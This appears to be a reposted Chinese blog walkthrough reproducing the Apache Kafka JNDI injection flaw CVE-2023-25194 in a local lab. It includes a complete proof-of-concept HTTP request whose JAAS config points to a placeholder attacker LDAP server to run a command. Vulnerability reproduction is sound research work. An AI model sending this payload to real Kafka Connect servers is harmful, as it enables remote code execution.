Apache Kafka JNDI注入漏洞(CVE-2023-25194)

admin 2023年3月9日08:00:54评论117 views字数 1583阅读5分16秒阅读模式

搭建漏洞环境(如果启动报错建议更换为JAVA11)

kafka_2.11-2.4.0.rar(74.6 MB)

http://archive.apache.org/dist/kafka/2.4.0/kafka_2.11-2.4.0.tgz

 

启动命令

  • binwindowszookeeper-server-start.bat configzookeeper.properties


  • binwindowskafka-server-start.bat configserver.properties


  • binwindowsconnect-standalone.bat config/connect-standalone.properties config/connect-file-source.properties config/connect-file-sink.properties

如果提示 输入行太长 命令语法不正确,输入:

  • set CLASSPATH=

漏洞复现

访问http://127.0.0.1:8083/connector-plugins查看是否存在依赖

Apache Kafka JNDI注入漏洞(CVE-2023-25194)

展开

注:需要对数据库进行配置(时区设置)

查看time_zone变量

  • show variables like '%time_zone%';

 

Apache Kafka JNDI注入漏洞(CVE-2023-25194)

 

设置时期:

  • set time_zone='+8:00';

  • show variables like '%time_zone%';

Apache Kafka JNDI注入漏洞(CVE-2023-25194)

POC代码如下:

接着使用如下请求包创建连接器

  • POST /connectors HTTP/1.1

  • Host: 127.0.0.1:8083

  • Content-Type: application/json

  • Content-Length: 821


  • {

  • "name": "debezium-test-50173",

  • "config": {

  • "connector.class": "io.debezium.connector.mysql.MySqlConnector",

  • "database.hostname": "127.0.0.1",

  • "database.port": "3306",

  • "database.user": "root",

  • "database.password": "root",

  • "database.server.id": "316545017",

  • "database.server.name": "test1",

  • "database.history.kafka.bootstrap.servers": "127.0.0.1:9092",

  • "database.history.kafka.topic": "quickstart-events", "database.history.producer.security.protocol": "SASL_SSL",

  • "database.history.producer.sasl.mechanism": "PLAIN",

  • "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://ip:8089/Basic/Command/calc" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"

  • }

  • }

Apache Kafka JNDI注入漏洞(CVE-2023-25194)

相关连接:

https://www.yuque.com/yuqueyonghukcxcby/wwdc80/yntiuyx4a6gnpn1zhttps://github.com/ohnonoyesyes/CVE-2023-25194

原文始发于微信公众号(TEST安全):Apache Kafka JNDI注入漏洞(CVE-2023-25194)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月9日08:00:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Kafka JNDI注入漏洞(CVE-2023-25194)http://cn-sec.com/archives/1592809.html

发表评论

匿名网友 填写信息